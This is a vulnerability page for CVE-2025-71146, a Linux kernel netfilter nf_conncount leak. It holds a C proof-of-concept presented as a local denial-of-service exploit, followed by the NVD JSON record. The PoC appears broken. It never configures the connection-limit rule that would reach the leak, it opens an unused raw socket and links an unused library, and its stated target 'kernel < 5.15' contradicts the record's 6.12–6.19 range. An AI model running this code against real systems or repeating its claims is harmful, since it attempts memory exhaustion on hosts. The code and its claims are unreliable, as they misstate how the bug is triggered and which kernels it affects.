CVE-2025-71146

/* * CVE-2025-71146 PoC - Linux kernel nf_conncount memory leak * This PoC demonstrates the resource leak by triggering error paths * Requires: root or low-privilege user with network namespace access * Build: gcc -o cve202571146 cve202571146.c -lnftables */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <net/if.h> #include <sys/wait.h> #define TARGET_CONNections 100000 void trigger_conntrack_leak() { int sock; struct sockaddr_in target; /* Create raw socket to interact with netfilter */ sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sock < 0) { perror("socket creation failed"); return; } /* Rapidly create and close connections to trigger error paths */ for (int i = 0; i < TARGET_CONNections; i++) { memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(80); target.sin_addr.s_addr = htonl(0xC0A80101); /* 192.168.1.1 */ int fd = socket(AF_INET, SOCK_STREAM, 0); if (fd >= 0) { /* Set socket options to trigger conntrack processing */ int flag = 1; setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)); /* Attempt connection that will fail - triggers error path */ connect(fd, (struct sockaddr*)&target, sizeof(target)); /* Close immediately without proper cleanup */ close(fd); } if (i % 1000 == 0) { printf("Progress: %d/%d connections attempted\n", i, TARGET_CONNections); } } close(sock); printf("Memory leak test completed. Check dmesg for conntrack warnings.\n"); } int main(int argc, char *argv[]) { printf("CVE-2025-71146 PoC - nf_conncount Memory Leak\n"); printf("Target: Linux kernel < 5.15 with vulnerable netfilter module\n"); printf("Impact: Local denial of service via memory exhaustion\n\n"); trigger_conntrack_leak(); printf("\nVerification:\n"); printf("1. Check system memory: free -h\n"); printf("2. Check conntrack entries: cat /proc/net/nf_conntrack | wc -l\n"); printf("3. Check dmesg for 'possible memory leak' warnings\n"); return 0; }

{"cve": {"id": "CVE-2025-71146", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:05.230", "lastModified": "2026-02-26T20:25:52.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conncount: fix leaked ct in error paths\n\nThere are some situations where ct might be leaked as error paths are\nskipping the refcounted check and return immediately. In order to solve\nit make sure that the check is always called."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnetfilter: nf_conncount: corrección de 'ct' filtrado en rutas de error\n\nExisten algunas situaciones en las que 'ct' podría filtrarse, ya que las rutas de error están omitiendo la verificación de conteo de referencias y retornan inmediatamente. Para resolverlo, hay que asegurarse de que la verificación siempre sea llamada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.13", "versionEndExcluding": "6.18", "matchCriteriaId": "7C298528-1754-41BD-B4E9-84A37AB7BA32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12.63:*:*:*:*:*:*:*", "matchCriteriaId": "7984A97B-8D26-49DE-B98A-80F987DC6ECE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18.2:*:*:*:*:*:*:*", "matchCriteriaId": "3F3959F8-92E0-4D2C-B5DA-B3BB4BE80113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/08fa37f4c8c59c294e9c18fea2d083ee94074e5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0b88be7211d21a0d68bb1e56dc805944e3654d6f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2e2a720766886190a6d35c116794693aabd332b6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/325eb61bb30790ea27782203a17b007ce1754a67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4bd2b89f4028f250dd1c1625eb3da1979b04a5e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1ac8dce3a893641bef224ad057932f142b8a36f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f381a33f34dda9e4023e38ba68c943bca83245e9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}